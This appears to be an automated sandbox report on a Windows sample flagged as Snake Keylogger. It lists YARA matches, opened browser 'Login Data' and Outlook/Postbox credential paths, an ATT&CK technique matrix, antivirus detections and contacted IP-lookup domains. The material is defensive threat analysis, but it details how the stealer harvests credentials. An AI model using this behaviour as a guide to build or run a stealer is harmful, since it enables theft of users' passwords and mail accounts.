Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Queries volume information: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\zam.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722282255.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3722196852.0000000003432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722282255.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3719586348.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3722196852.000000000333B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6056, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6056, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722282255.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3722196852.0000000003432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722282255.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3719586348.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3722196852.000000000333B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6056, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
zam.exe	45%	ReversingLabs	Win32.Trojan.Strictor
zam.exe	100%	Avira	HEUR/AGEN.1309789
zam.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	100%	Avira	HEUR/AGEN.1309789
C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	45%	ReversingLabs	Win32.Trojan.Strictor

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
reallyfreegeoip.org	188.114.96.3	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
15.164.165.52.in-addr.arpa	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high
197.87.175.4.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/173.254.250.90	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003275000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003226000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003275000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/173.254.250.90$	MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003275000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	zam.exe, 00000000.00000002.1310701258.0000000002808000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXV.	HaNkyQWPIIzrnC.exe, 00000011.00000002.1351377685.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	zam.exe, 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	zam.exe, 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
50.31.176.103	unknown	United States	23352	SERVERCENTRALUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552315
Start date and time:	2024-11-08 16:14:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zam.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/15@4/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 370 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 199.232.214.172, 13.95.31.18, 20.242.39.171, 52.165.164.15, 52.149.20.212, 4.175.87.197, 20.12.23.50
